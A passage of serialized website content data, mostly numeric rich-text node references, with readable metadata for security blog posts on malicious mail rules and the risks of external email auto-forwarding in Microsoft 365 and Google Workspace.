349135],{"nodeType":173,"value":230233,"marks":349136,"data":349137},[],{},{"nodeType":178,"data":349139,"content":349140},{},[349141,349144,349154,349157,349161],{"nodeType":173,"value":230240,"marks":349142,"data":349143},[],{},{"nodeType":186,"data":349145,"content":349146},{"uri":183364},[349147,349151],{"nodeType":173,"value":230247,"marks":349148,"data":349150},[349149],{"type":194},{},{"nodeType":173,"value":1260,"marks":349152,"data":349153},[],{},{"nodeType":173,"value":230255,"marks":349155,"data":349156},[],{},{"nodeType":173,"value":230259,"marks":349158,"data":349160},[349159],{"type":370},{},{"nodeType":173,"value":230264,"marks":349162,"data":349163},[],{},{"nodeType":169,"data":349165,"content":349166},{},[349167],{"nodeType":173,"value":143524,"marks":349168,"data":349169},[],{},{"nodeType":178,"data":349171,"content":349172},{},[349173],{"nodeType":173,"value":230277,"marks":349174,"data":349175},[],{},{"nodeType":250,"data":349177,"content":349178},{},[349179,349188,349197],{"nodeType":254,"data":349180,"content":349181},{},[349182],{"nodeType":178,"data":349183,"content":349184},{},[349185],{"nodeType":173,"value":230290,"marks":349186,"data":349187},[],{},{"nodeType":254,"data":349189,"content":349190},{},[349191],{"nodeType":178,"data":349192,"content":349193},{},[349194],{"nodeType":173,"value":230300,"marks":349195,"data":349196},[],{},{"nodeType":254,"data":349198,"content":349199},{},[349200],{"nodeType":178,"data":349201,"content":349202},{},[349203],{"nodeType":173,"value":230310,"marks":349204,"data":349205},[],{},{"nodeType":169,"data":349207,"content":349208},{},[349209],{"nodeType":173,"value":230317,"marks":349210,"data":349211},[],{},{"nodeType":178,"data":349213,"content":349214},{},[349215],{"nodeType":173,"value":230324,"marks":349216,"data":349217},[],{},{"nodeType":250,"data":349219,"content":349220},{},[349221,349234,349264,349287],{"nodeType":254,"data":349222,"content":349223},{},[349224],{"nodeType":178,"data":349225,"content":349226},{},[349227,349231],{"nodeType":173,"value":230337,"marks":349228,"data":349230},[349229],{"type":370},{},{"nodeType":173,"value":230342,"marks":349232,"data":349233},[],{},{"nodeType":254,"data":349235,"content":349236},{},[349237],{"nodeType":178,"data":349238,"content":349239},{},[349240,349244,349247,349251,349254,349261],{"nodeType":173,"value":230352,"marks":349241,"data":349243},[349242],{"type":370},{},{"nodeType":173,"value":3107,"marks":349245,"data":349246},[],{},{"nodeType":173,"value":230360,"marks":349248,"data":349250},[349249],{"type":370},{},{"nodeType":173,"value":230365,"marks":349252,"data":349253},[],{},{"nodeType":186,"data":349255,"content":349256},{"uri":230370},[349257],{"nodeType":173,"value":230373,"marks":349258,"data":349260},[349259],{"type":194},{},{"nodeType":173,"value":37,"marks":349262,"data":349263},[],{},{"nodeType":254,"data":349265,"content":349266},{},[349267],{"nodeType":178,"data":349268,"content":349269},{},[349270,349274,349277,349284],{"nodeType":173,"value":230387,"marks":349271,"data":349273},[349272],{"type":370},{},{"nodeType":173,"value":230392,"marks":349275,"data":349276},[],{},{"nodeType":186,"data":349278,"content":349279},{"uri":230397},[349280],{"nodeType":173,"value":230400,"marks":349281,"data":349283},[349282],{"type":194},{},{"nodeType":173,"value":230405,"marks":349285,"data":349286},[],{},{"nodeType":254,"data":349288,"content":349289},{},[349290],{"nodeType":178,"data":349291,"content":349292},{},[349293,349297],{"nodeType":173,"value":230415,"marks":349294,"data":349296},[349295],{"type":370},{},{"nodeType":173,"value":230420,"marks":349298,"data":349299},[],{},{"nodeType":178,"data":349301,"content":349302},{},[349303,349306,349312],{"nodeType":173,"value":230427,"marks":349304,"data":349305},[],{},{"nodeType":186,"data":349307,"content":349308},{"uri":75048},[349309],{"nodeType":173,"value":230434,"marks":349310,"data":349311},[],{},{"nodeType":173,"value":2340,"marks":349313,"data":349314},[],{},{"nodeType":169,"data":349316,"content":349317},{},[349318],{"nodeType":173,"value":40632,"marks":349319,"data":349320},[],{},{"nodeType":178,"data":349322,"content":349323},{},[349324],{"nodeType":173,"value":230450,"marks":349325,"data":349326},[],{},{"nodeType":178,"data":349328,"content":349329},{},[349330],{"nodeType":173,"value":230457,"marks":349331,"data":349332},[],{},{"nodeType":178,"data":349334,"content":349335},{},[349336],{"nodeType":173,"value":230464,"marks":349337,"data":349338},[],{},{"nodeType":178,"data":349340,"content":349341},{},[349342,349345,349352,349355,349362,349365,349372,349375,349382],{"nodeType":173,"value":230471,"marks":349343,"data":349344},[],{},{"nodeType":186,"data":349346,"content":349347},{"uri":181526},[349348],{"nodeType":173,"value":226380,"marks":349349,"data":349351},[349350],{"type":194},{},{"nodeType":173,"value":1464,"marks":349353,"data":349354},[],{},{"nodeType":186,"data":349356,"content":349357},{"uri":181538},[349358],{"nodeType":173,"value":230488,"marks":349359,"data":349361},[349360],{"type":194},{},{"nodeType":173,"value":230493,"marks":349363,"data":349364},[],{},{"nodeType":186,"data":349366,"content":349367},{"uri":70029},[349368],{"nodeType":173,"value":230500,"marks":349369,"data":349371},[349370],{"type":194},{},{"nodeType":173,"value":230505,"marks":349373,"data":349374},[],{},{"nodeType":186,"data":349376,"content":349377},{"uri":162243},[349378],{"nodeType":173,"value":230512,"marks":349379,"data":349381},[349380],{"type":194},{},{"nodeType":173,"value":230517,"marks":349383,"data":349384},[],{},{"nodeType":178,"data":349386,"content":349387},{},[349388],{"nodeType":173,"value":230524,"marks":349389,"data":349390},[],{},{"nodeType":231,"data":349392,"content":349393},{},[],{"nodeType":178,"data":349395,"content":349396},{},[349397],{"nodeType":173,"value":230534,"marks":349398,"data":349399},[],{},{"nodeType":312,"data":349401,"content":349404},{"target":349402},{"sys":349403},{"id":229805,"type":317,"linkType":318},[],{"nodeType":178,"data":349406,"content":349407},{},[349408],{"nodeType":173,"value":37,"marks":349409,"data":349410},[],{},{"items":349412},[349413,349415],{"sys":349414,"name":505},{"id":504},{"sys":349416,"name":509},{"id":508},{"items":349418},[349419],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":349420},{"url":8615},{"__typename":1528,"sys":349422,"content":349423,"title":123379,"synopsis":123380,"hashTags":118,"publishedDate":98343,"slug":123381,"tagsCollection":349889,"authorsCollection":349895},{"id":123366},{"json":349424},{"nodeType":165,"data":349425,"content":349426},{},[349427,349433,349439,349449,349459,349462,349469,349475,349481,349487,349493,349499,349504,349510,349515,349518,349525,349531,349561,349567,349574,349580,349586,349592,349598,349605,349611,349616,349622,349642,349648,349655,349661,349667,349673,349678,349684,349700,349703,349710,349723,349729,349763,349770,349773,349780,349786,349799,349804,349810,349816,349822,349827,349833,349838,349841,349848,349854,349859,349864,349883],{"nodeType":178,"data":349428,"content":349429},{},[349430],{"nodeType":173,"value":97703,"marks":349431,"data":349432},[],{},{"nodeType":178,"data":349434,"content":349435},{},[349436],{"nodeType":173,"value":97717,"marks":349437,"data":349438},[],{},{"nodeType":178,"data":349440,"content":349441},{},[349442,349445],{"nodeType":173,"value":124896,"marks":349443,"data":349444},[],{},{"nodeType":173,"value":124900,"marks":349446,"data":349448},[349447],{"type":370},{},{"nodeType":178,"data":349450,"content":349451},{},[349452,349455],{"nodeType":173,"value":124908,"marks":349453,"data":349454},[],{},{"nodeType":173,"value":124912,"marks":349456,"data":349458},[349457],{"type":370},{},{"nodeType":231,"data":349460,"content":349461},{},[],{"nodeType":169,"data":349463,"content":349464},{},[349465],{"nodeType":173,"value":124923,"marks":349466,"data":349468},[349467],{"type":370},{},{"nodeType":178,"data":349470,"content":349471},{},[349472],{"nodeType":173,"value":97862,"marks":349473,"data":349474},[],{},{"nodeType":178,"data":349476,"content":349477},{},[349478],{"nodeType":173,"value":124937,"marks":349479,"data":349480},[],{},{"nodeType":178,"data":349482,"content":349483},{},[349484],{"nodeType":173,"value":124944,"marks":349485,"data":349486},[],{},{"nodeType":178,"data":349488,"content":349489},{},[349490],{"nodeType":173,"value":124951,"marks":349491,"data":349492},[],{},{"nodeType":178,"data":349494,"content":349495},{},[349496],{"nodeType":173,"value":124958,"marks":349497,"data":349498},[],{},{"nodeType":312,"data":349500,"content":349503},{"target":349501},{"sys":349502},{"id":124965,"type":317,"linkType":318},[],{"nodeType":178,"data":349505,"content":349506},{},[349507],{"nodeType":173,"value":124971,"marks":349508,"data":349509},[],{},{"nodeType":312,"data":349511,"content":349514},{"target":349512},{"sys":349513},{"id":98333,"type":317,"linkType":318},[],{"nodeType":231,"data":349516,"content":349517},{},[],{"nodeType":169,"data":349519,"content":349520},{},[349521],{"nodeType":173,"value":124986,"marks":349522,"data":349524},[349523],{"type":370},{},{"nodeType":178,"data":349526,"content":349527},{},[349528],{"nodeType":173,"value":124994,"marks":349529,"data":349530},[],{},{"nodeType":250,"data":349532,"content":349533},{},[349534,349543,349552],{"nodeType":254,"data":349535,"content":349536},{},[349537],{"nodeType":178,"data":349538,"content":349539},{},[349540],{"nodeType":173,"value":125007,"marks":349541,"data":349542},[],{},{"nodeType":254,"data":349544,"content":349545},{},[349546],{"nodeType":178,"data":349547,"content":349548},{},[349549],{"nodeType":173,"value":125017,"marks":349550,"data":349551},[],{},{"nodeType":254,"data":349553,"content":349554},{},[349555],{"nodeType":178,"data":349556,"content":349557},{},[349558],{"nodeType":173,"value":125027,"marks":349559,"data":349560},[],{},{"nodeType":178,"data":349562,"content":349563},{},[349564],{"nodeType":173,"value":125034,"marks":349565,"data":349566},[],{},{"nodeType":235,"data":349568,"content":349569},{},[349570],{"nodeType":173,"value":125041,"marks":349571,"data":349573},[349572],{"type":370},{},{"nodeType":178,"data":349575,"content":349576},{},[349577],{"nodeType":173,"value":125049,"marks":349578,"data":349579},[],{},{"nodeType":178,"data":349581,"content":349582},{},[349583],{"nodeType":173,"value":125056,"marks":349584,"data":349585},[],{},{"nodeType":178,"data":349587,"content":349588},{},[349589],{"nodeType":173,"value":125063,"marks":349590,"data":349591},[],{},{"nodeType":178,"data":349593,"content":349594},{},[349595],{"nodeType":173,"value":97966,"marks":349596,"data":349597},[],{},{"nodeType":235,"data":349599,"content":349600},{},[349601],{"nodeType":173,"value":125076,"marks":349602,"data":349604},[349603],{"type":370},{},{"nodeType":178,"data":349606,"content":349607},{},[349608],{"nodeType":173,"value":125084,"marks":349609,"data":349610},[],{},{"nodeType":312,"data":349612,"content":349615},{"target":349613},{"sys":349614},{"id":97821,"type":317,"linkType":318},[],{"nodeType":178,"data":349617,"content":349618},{},[349619],{"nodeType":173,"value":125096,"marks":349620,"data":349621},[],{},{"nodeType":178,"data":349623,"content":349624},{},[349625,349628,349632,349635,349639],{"nodeType":173,"value":125103,"marks":349626,"data":349627},[],{},{"nodeType":173,"value":97831,"marks":349629,"data":349631},[349630],{"type":370},{},{"nodeType":173,"value":97836,"marks":349633,"data":349634},[],{},{"nodeType":173,"value":5440,"marks":349636,"data":349638},[349637],{"type":370},{},{"nodeType":173,"value":97844,"marks":349640,"data":349641},[],{},{"nodeType":178,"data":349643,"content":349644},{},[349645],{"nodeType":173,"value":125124,"marks":349646,"data":349647},[],{},{"nodeType":235,"data":349649,"content":349650},{},[349651],{"nodeType":173,"value":125131,"marks":349652,"data":349654},[349653],{"type":370},{},{"nodeType":178,"data":349656,"content":349657},{},[349658],{"nodeType":173,"value":125139,"marks":349659,"data":349660},[],{},{"nodeType":178,"data":349662,"content":349663},{},[349664],{"nodeType":173,"value":125146,"marks":349665,"data":349666},[],{},{"nodeType":178,"data":349668,"content":349669},{},[349670],{"nodeType":173,"value":125153,"marks":349671,"data":349672},[],{},{"nodeType":312,"data":349674,"content":349677},{"target":349675},{"sys":349676},{"id":97795,"type":317,"linkType":318},[],{"nodeType":178,"data":349679,"content":349680},{},[349681],{"nodeType":173,"value":125165,"marks":349682,"data":349683},[],{},{"nodeType":178,"data":349685,"content":349686},{},[349687,349690,349697],{"nodeType":173,"value":98005,"marks":349688,"data":349689},[],{},{"nodeType":186,"data":349691,"content":349692},{"uri":125176},[349693],{"nodeType":173,"value":98013,"marks":349694,"data":349696},[349695],{"type":194},{},{"nodeType":173,"value":98018,"marks":349698,"data":349699},[],{},{"nodeType":231,"data":349701,"content":349702},{},[],{"nodeType":169,"data":349704,"content":349705},{},[349706],{"nodeType":173,"value":125192,"marks":349707,"data":349709},[349708],{"type":370},{},{"nodeType":178,"data":349711,"content":349712},{},[349713,349716,349720],{"nodeType":173,"value":125200,"marks":349714,"data":349715},[],{},{"nodeType":173,"value":98130,"marks":349717,"data":349719},[349718],{"type":370},{},{"nodeType":173,"value":197,"marks":349721,"data":349722},[],{},{"nodeType":178,"data":349724,"content":349725},{},[349726],{"nodeType":173,"value":98141,"marks":349727,"data":349728},[],{},{"nodeType":178,"data":349730,"content":349731},{},[349732,349735,349739,349742,349746,349749,349753,349756,349760],{"nodeType":173,"value":98148,"marks":349733,"data":349734},[],{},{"nodeType":173,"value":98152,"marks":349736,"data":349738},[349737],{"type":370},{},{"nodeType":173,"value":98157,"marks":349740,"data":349741},[],{},{"nodeType":173,"value":98161,"marks":349743,"data":349745},[349744],{"type":370},{},{"nodeType":173,"value":98166,"marks":349747,"data":349748},[],{},{"nodeType":173,"value":98161,"marks":349750,"data":349752},[349751],{"type":370},{},{"nodeType":173,"value":98174,"marks":349754,"data":349755},[],{},{"nodeType":173,"value":98178,"marks":349757,"data":349759},[349758],{"type":370},{},{"nodeType":173,"value":98183,"marks":349761,"data":349762},[],{},{"nodeType":178,"data":349764,"content":349765},{},[349766],{"nodeType":173,"value":125254,"marks":349767,"data":349769},[349768],{"type":370},{},{"nodeType":231,"data":349771,"content":349772},{},[],{"nodeType":169,"data":349774,"content":349775},{},[349776],{"nodeType":173,"value":125265,"marks":349777,"data":349779},[349778],{"type":370},{},{"nodeType":178,"data":349781,"content":349782},{},[349783],{"nodeType":173,"value":125273,"marks":349784,"data":349785},[],{},{"nodeType":178,"data":349787,"content":349788},{},[349789,349792,349796],{"nodeType":173,"value":125280,"marks":349790,"data":349791},[],{},{"nodeType":173,"value":97888,"marks":349793,"data":349795},[349794],{"type":370},{},{"nodeType":173,"value":197,"marks":349797,"data":349798},[],{},{"nodeType":312,"data":349800,"content":349803},{"target":349801},{"sys":349802},{"id":97899,"type":317,"linkType":318},[],{"nodeType":178,"data":349805,"content":349806},{},[349807],{"nodeType":173,"value":97905,"marks":349808,"data":349809},[],{},{"nodeType":178,"data":349811,"content":349812},{},[349813],{"nodeType":173,"value":97912,"marks":349814,"data":349815},[],{},{"nodeType":178,"data":349817,"content":349818},{},[349819],{"nodeType":173,"value":125311,"marks":349820,"data":349821},[],{},{"nodeType":312,"data":349823,"content":349826},{"target":349824},{"sys":349825},{"id":97919,"type":317,"linkType":318},[],{"nodeType":178,"data":349828,"content":349829},{},[349830],{"nodeType":173,"value":125323,"marks":349831,"data":349832},[],{},{"nodeType":312,"data":349834,"content":349837},{"target":349835},{"sys":349836},{"id":98089,"type":317,"linkType":318},[],{"nodeType":231,"data":349839,"content":349840},{},[],{"nodeType":169,"data":349842,"content":349843},{},[349844],{"nodeType":173,"value":98205,"marks":349845,"data":349847},[349846],{"type":370},{},{"nodeType":178,"data":349849,"content":349850},{},[349851],{"nodeType":173,"value":98213,"marks":349852,"data":349853},[],{},{"nodeType":312,"data":349855,"content":349858},{"target":349856},{"sys":349857},{"id":98102,"type":317,"linkType":318},[],{"nodeType":312,"data":349860,"content":349863},{"target":349861},{"sys":349862},{"id":98333,"type":317,"linkType":318},[],{"nodeType":3769,"data":349865,"content":349866},{},[349867],{"nodeType":178,"data":349868,"content":349869},{},[349870,349873,349880],{"nodeType":173,"value":61741,"marks":349871,"data":349872},[],{},{"nodeType":186,"data":349874,"content":349875},{"uri":125368},[349876],{"nodeType":173,"value":1472,"marks":349877,"data":349879},[349878],{"type":194},{},{"nodeType":173,"value":1477,"marks":349881,"data":349882},[],{},{"nodeType":178,"data":349884,"content":349885},{},[349886],{"nodeType":173,"value":37,"marks":349887,"data":349888},[],{},{"items":349890},[349891,349893],{"sys":349892,"name":509},{"id":508},{"sys":349894,"name":505},{"id":504},{"items":349896},[349897],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":349898},{"url":1496},{"items":349900},[349901],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":349902},{"url":19129},{"json":349904,"links":350199},{"nodeType":165,"data":349905,"content":349906},{},[349907,349913,349918,349924,349940,349963,349969,350044,350059,350062,350068,350083,350089,350095,350098,350104,350141,350147,350162,350168,350171,350178,350184],{"nodeType":178,"data":349908,"content":349909},{},[349910],{"nodeType":173,"value":317265,"marks":349911,"data":349912},[],{},{"nodeType":312,"data":349914,"content":349917},{"target":349915},{"sys":349916},{"id":317272,"type":317,"linkType":318},[],{"nodeType":178,"data":349919,"content":349920},{},[349921],{"nodeType":173,"value":317278,"marks":349922,"data":349923},[],{},{"nodeType":3769,"data":349925,"content":349926},{},[349927],{"nodeType":178,"data":349928,"content":349929},{},[349930,349933,349937],{"nodeType":173,"value":317288,"marks":349931,"data":349932},[],{},{"nodeType":173,"value":317292,"marks":349934,"data":349936},[349935],{"type":370},{},{"nodeType":173,"value":317297,"marks":349938,"data":349939},[],{},{"nodeType":178,"data":349941,"content":349942},{},[349943,349946,349953,349956,349960],{"nodeType":173,"value":317304,"marks":349944,"data":349945},[],{},{"nodeType":186,"data":349947,"content":349948},{"uri":317309},[349949],{"nodeType":173,"value":22819,"marks":349950,"data":349952},[349951],{"type":194},{},{"nodeType":173,"value":317316,"marks":349954,"data":349955},[],{},{"nodeType":173,"value":317320,"marks":349957,"data":349959},[349958],{"type":1646},{},{"nodeType":173,"value":317325,"marks":349961,"data":349962},[],{},{"nodeType":178,"data":349964,"content":349965},{},[349966],{"nodeType":173,"value":317332,"marks":349967,"data":349968},[],{},{"nodeType":250,"data":349970,"content":349971},{},[349972,349990,350008,350026],{"nodeType":254,"data":349973,"content":349974},{},[349975],{"nodeType":178,"data":349976,"content":349977},{},[349978,349981,349987],{"nodeType":173,"value":37,"marks":349979,"data":349980},[],{},{"nodeType":186,"data":349982,"content":349983},{"uri":317349},[349984],{"nodeType":173,"value":317352,"marks":349985,"data":349986},[],{},{"nodeType":173,"value":37,"marks":349988,"data":349989},[],{},{"nodeType":254,"data":349991,"content":349992},{},[349993],{"nodeType":178,"data":349994,"content":349995},{},[349996,349999,350005],{"nodeType":173,"value":37,"marks":349997,"data":349998},[],{},{"nodeType":186,"data":350000,"content":350001},{"uri":317369},[350002],{"nodeType":173,"value":317372,"marks":350003,"data":350004},[],{},{"nodeType":173,"value":37,"marks":350006,"data":350007},[],{},{"nodeType":254,"data":350009,"content":350010},{},[350011],{"nodeType":178,"data":350012,"content":350013},{},[350014,350017,350023],{"nodeType":173,"value":37,"marks":350015,"data":350016},[],{},{"nodeType":186,"data":350018,"content":350019},{"uri":317389},[350020],{"nodeType":173,"value":317392,"marks":350021,"data":350022},[],{},{"nodeType":173,"value":10557,"marks":350024,"data":350025},[],{},{"nodeType":254,"data":350027,"content":350028},{},[350029],{"nodeType":178,"data":350030,"content":350031},{},[350032,350035,350041],{"nodeType":173,"value":37,"marks":350033,"data":350034},[],{},{"nodeType":186,"data":350036,"content":350037},{"uri":317409},[350038],{"nodeType":173,"value":317412,"marks":350039,"data":350040},[],{},{"nodeType":173,"value":37,"marks":350042,"data":350043},[],{},{"nodeType":178,"data":350045,"content":350046},{},[350047,350050,350056],{"nodeType":173,"value":317422,"marks":350048,"data":350049},[],{},{"nodeType":186,"data":350051,"content":350052},{"uri":317427},[350053],{"nodeType":173,"value":317430,"marks":350054,"data":350055},[],{},{"nodeType":173,"value":317434,"marks":350057,"data":350058},[],{},{"nodeType":231,"data":350060,"content":350061},{},[],{"nodeType":169,"data":350063,"content":350064},{},[350065],{"nodeType":173,"value":317444,"marks":350066,"data":350067},[],{},{"nodeType":178,"data":350069,"content":350070},{},[350071,350074,350080],{"nodeType":173,"value":37,"marks":350072,"data":350073},[],{},{"nodeType":186,"data":350075,"content":350076},{"uri":317455},[350077],{"nodeType":173,"value":317458,"marks":350078,"data":350079},[],{},{"nodeType":173,"value":317462,"marks":350081,"data":350082},[],{},{"nodeType":178,"data":350084,"content":350085},{},[350086],{"nodeType":173,"value":317469,"marks":350087,"data":350088},[],{},{"nodeType":178,"data":350090,"content":350091},{},[350092],{"nodeType":173,"value":317476,"marks":350093,"data":350094},[],{},{"nodeType":231,"data":350096,"content":350097},{},[],{"nodeType":169,"data":350099,"content":350100},{},[350101],{"nodeType":173,"value":317486,"marks":350102,"data":350103},[],{},{"nodeType":178,"data":350105,"content":350106},{},[350107,350110,350116,350119,350127,350130,350138],{"nodeType":173,"value":317493,"marks":350108,"data":350109},[],{},{"nodeType":186,"data":350111,"content":350112},{"uri":317498},[350113],{"nodeType":173,"value":317501,"marks":350114,"data":350115},[],{},{"nodeType":173,"value":317505,"marks":350117,"data":350118},[],{},{"nodeType":1698,"data":350120,"content":350123},{"target":350121},{"sys":350122},{"id":317512,"type":317,"linkType":318},[350124],{"nodeType":173,"value":317515,"marks":350125,"data":350126},[],{},{"nodeType":173,"value":1464,"marks":350128,"data":350129},[],{},{"nodeType":1698,"data":350131,"content":350134},{"target":350132},{"sys":350133},{"id":317525,"type":317,"linkType":318},[350135],{"nodeType":173,"value":211147,"marks":350136,"data":350137},[],{},{"nodeType":173,"value":1477,"marks":350139,"data":350140},[],{},{"nodeType":178,"data":350142,"content":350143},{},[350144],{"nodeType":173,"value":317537,"marks":350145,"data":350146},[],{},{"nodeType":178,"data":350148,"content":350149},{},[350150,350153,350159],{"nodeType":173,"value":317544,"marks":350151,"data":350152},[],{},{"nodeType":186,"data":350154,"content":350155},{"uri":317498},[350156],{"nodeType":173,"value":139178,"marks":350157,"data":350158},[],{},{"nodeType":173,"value":1477,"marks":350160,"data":350161},[],{},{"nodeType":178,"data":350163,"content":350164},{},[350165],{"nodeType":173,"value":317560,"marks":350166,"data":350167},[],{},{"nodeType":231,"data":350169,"content":350170},{},[],{"nodeType":169,"data":350172,"content":350173},{},[350174],{"nodeType":173,"value":18605,"marks":350175,"data":350177},[350176],{"type":370},{},{"nodeType":178,"data":350179,"content":350180},{},[350181],{"nodeType":173,"value":69741,"marks":350182,"data":350183},[],{},{"nodeType":178,"data":350185,"content":350186},{},[350187,350190,350196],{"nodeType":173,"value":61741,"marks":350188,"data":350189},[],{},{"nodeType":186,"data":350191,"content":350192},{"uri":98320},[350193],{"nodeType":173,"value":1472,"marks":350194,"data":350195},[],{},{"nodeType":173,"value":1477,"marks":350197,"data":350198},[],{},{"entries":350200},{"inline":350201,"hyperlink":350202,"block":350213},[],[350203,350208],{"sys":350204,"__typename":6655,"title":350205,"slug":350206,"articleId":350207},{"id":317512},"What to do if you find a malicious mail rule in Microsoft 365","what-to-do-if-you-find-a-malicious-mail-rule-microsoft-office-365",10021,{"sys":350209,"__typename":6655,"title":350210,"slug":350211,"articleId":350212},{"id":317525},"What to do when you find a malicious mail filter in Google Workspace","what-to-do-when-you-find-a-malicious-mail-filter-in-google-workspace",10022,[350214],{"sys":350215,"__typename":5345,"title":350216,"caption":350216,"layoutMode":118,"file":350217},{"id":317272},"Microsoft Outlook ‘forward email’ rule in Office 365",{"url":350218,"width":333817,"height":333818},"https://images.ctfassets.net/y1cdw1ablpvd/7d9KtwtX1HE0imQzE6tvwm/d1316f98a9bfc1245d93377236c94282/legit-rules.jpg","content:blog:email-security-how-hackers-use-mail-rules-to-access-your-inbox.json","blog/email-security-how-hackers-use-mail-rules-to-access-your-inbox.json","blog/email-security-how-hackers-use-mail-rules-to-access-your-inbox",{"_path":350223,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":350224,"ogImage":118,"summary":350226,"title":317937,"subtitle":118,"metaTitle":350237,"synopsis":317938,"hashTags":350238,"publishedDate":317940,"slug":317941,"tagsCollection":350239,"content":350245,"relatedBlogPostsCollection":350539,"authorsCollection":350951,"_id":350955,"_type":5439,"_source":5440,"_file":350956,"_stem":350957,"_extension":5439},"/blog/should-you-disable-external-email-auto-forwarding",{"id":317617,"publishedAt":350225},"2024-03-21T09:22:46.852Z",{"json":350227},{"data":350228,"content":350229,"nodeType":165},{},[350230],{"data":350231,"content":350232,"nodeType":178},{},[350233],{"data":350234,"marks":350235,"value":350236,"nodeType":173},{},[],"If your users have a business case for external email auto-forwarding, this risk can absolutely be managed - it's not something you must disable. However, if no one’s using the feature, it is a good idea to disable it since it limits the potential impact of an account compromise.","Understanding the risks of external email auto-forwarding",[317597,317598,317599,317600,317601],{"items":350240},[350241,350243],{"sys":350242,"name":505},{"id":504},{"sys":350244,"name":509},{"id":508},{"json":350246,"links":350518},{"data":350247,"content":350248,"nodeType":165},{},[350249,350264,350270,350294,350307,350313,350319,350325,350332,350338,350354,350360,350376,350381,350388,350394,350410,350417,350433,350440,350446,350494,350501,350507,350512],{"data":350250,"content":350251,"nodeType":178},{},[350252,350255,350261],{"data":350253,"marks":350254,"value":317628,"nodeType":173},{},[],{"data":350256,"content":350257,"nodeType":186},{"uri":317631},[350258],{"data":350259,"marks":350260,"value":317636,"nodeType":173},{},[],{"data":350262,"marks":350263,"value":317640,"nodeType":173},{},[],{"data":350265,"content":350266,"nodeType":235},{},[350267],{"data":350268,"marks":350269,"value":317647,"nodeType":173},{},[],{"data":350271,"content":350272,"nodeType":178},{},[350273,350276,350280,350283,350291],{"data":350274,"marks":350275,"value":317654,"nodeType":173},{},[],{"data":350277,"marks":350278,"value":317659,"nodeType":173},{},[350279],{"type":370},{"data":350281,"marks":350282,"value":317663,"nodeType":173},{},[],{"data":350284,"content":350287,"nodeType":1698},{"target":350285},{"sys":350286},{"id":317512,"type":317,"linkType":318},[350288],{"data":350289,"marks":350290,"value":317672,"nodeType":173},{},[],{"data":350292,"marks":350293,"value":317676,"nodeType":173},{},[],{"data":350295,"content":350296,"nodeType":178},{},[350297,350300,350304],{"data":350298,"marks":350299,"value":317683,"nodeType":173},{},[],{"data":350301,"marks":350302,"value":317688,"nodeType":173},{},[350303],{"type":370},{"data":350305,"marks":350306,"value":317692,"nodeType":173},{},[],{"data":350308,"content":350309,"nodeType":235},{},[350310],{"data":350311,"marks":350312,"value":317699,"nodeType":173},{},[],{"data":350314,"content":350315,"nodeType":178},{},[350316],{"data":350317,"marks":350318,"value":317706,"nodeType":173},{},[],{"data":350320,"content":350321,"nodeType":178},{},[350322],{"data":350323,"marks":350324,"value":317713,"nodeType":173},{},[],{"data":350326,"content":350327,"nodeType":178},{},[350328],{"data":350329,"marks":350330,"value":317721,"nodeType":173},{},[350331],{"type":370},{"data":350333,"content":350334,"nodeType":178},{},[350335],{"data":350336,"marks":350337,"value":317728,"nodeType":173},{},[],{"data":350339,"content":350340,"nodeType":178},{},[350341,350344,350351],{"data":350342,"marks":350343,"value":317735,"nodeType":173},{},[],{"data":350345,"content":350346,"nodeType":186},{"uri":317738},[350347],{"data":350348,"marks":350349,"value":317744,"nodeType":173},{},[350350],{"type":194},{"data":350352,"marks":350353,"value":317748,"nodeType":173},{},[],{"data":350355,"content":350356,"nodeType":178},{},[350357],{"data":350358,"marks":350359,"value":317755,"nodeType":173},{},[],{"data":350361,"content":350362,"nodeType":178},{},[350363,350366,350373],{"data":350364,"marks":350365,"value":317762,"nodeType":173},{},[],{"data":350367,"content":350368,"nodeType":186},{"uri":317765},[350369],{"data":350370,"marks":350371,"value":317771,"nodeType":173},{},[350372],{"type":194},{"data":350374,"marks":350375,"value":317775,"nodeType":173},{},[],{"data":350377,"content":350380,"nodeType":312},{"target":350378},{"sys":350379},{"id":317780,"type":317,"linkType":318},[],{"data":350382,"content":350383,"nodeType":178},{},[350384],{"data":350385,"marks":350386,"value":317789,"nodeType":173},{},[350387],{"type":370},{"data":350389,"content":350390,"nodeType":178},{},[350391],{"data":350392,"marks":350393,"value":317796,"nodeType":173},{},[],{"data":350395,"content":350396,"nodeType":178},{},[350397,350400,350407],{"data":350398,"marks":350399,"value":317803,"nodeType":173},{},[],{"data":350401,"content":350402,"nodeType":186},{"uri":317806},[350403],{"data":350404,"marks":350405,"value":317812,"nodeType":173},{},[350406],{"type":194},{"data":350408,"marks":350409,"value":317816,"nodeType":173},{},[],{"data":350411,"content":350412,"nodeType":178},{},[350413],{"data":350414,"marks":350415,"value":317824,"nodeType":173},{},[350416],{"type":370},{"data":350418,"content":350419,"nodeType":178},{},[350420,350423,350430],{"data":350421,"marks":350422,"value":317831,"nodeType":173},{},[],{"data":350424,"content":350425,"nodeType":186},{"uri":317834},[350426],{"data":350427,"marks":350428,"value":317840,"nodeType":173},{},[350429],{"type":194},{"data":350431,"marks":350432,"value":1477,"nodeType":173},{},[],{"data":350434,"content":350435,"nodeType":178},{},[350436],{"data":350437,"marks":350438,"value":317851,"nodeType":173},{},[350439],{"type":370},{"data":350441,"content":350442,"nodeType":178},{},[350443],{"data":350444,"marks":350445,"value":317858,"nodeType":173},{},[],{"data":350447,"content":350448,"nodeType":250},{},[350449,350458,350467,350476,350485],{"data":350450,"content":350451,"nodeType":254},{},[350452],{"data":350453,"content":350454,"nodeType":178},{},[350455],{"data":350456,"marks":350457,"value":317871,"nodeType":173},{},[],{"data":350459,"content":350460,"nodeType":254},{},[350461],{"data":350462,"content":350463,"nodeType":178},{},[350464],{"data":350465,"marks":350466,"value":317881,"nodeType":173},{},[],{"data":350468,"content":350469,"nodeType":254},{},[350470],{"data":350471,"content":350472,"nodeType":178},{},[350473],{"data":350474,"marks":350475,"value":317891,"nodeType":173},{},[],{"data":350477,"content":350478,"nodeType":254},{},[350479],{"data":350480,"content":350481,"nodeType":178},{},[350482],{"data":350483,"marks":350484,"value":317901,"nodeType":173},{},[],{"data":350486,"content":350487,"nodeType":254},{},[350488],{"data":350489,"content":350490,"nodeType":178},{},[350491],{"data":350492,"marks":350493,"value":317911,"nodeType":173},{},[],{"data":350495,"content":350496,"nodeType":178},{},[350497],{"data":350498,"marks":350499,"value":40632,"nodeType":173},{},[350500],{"type"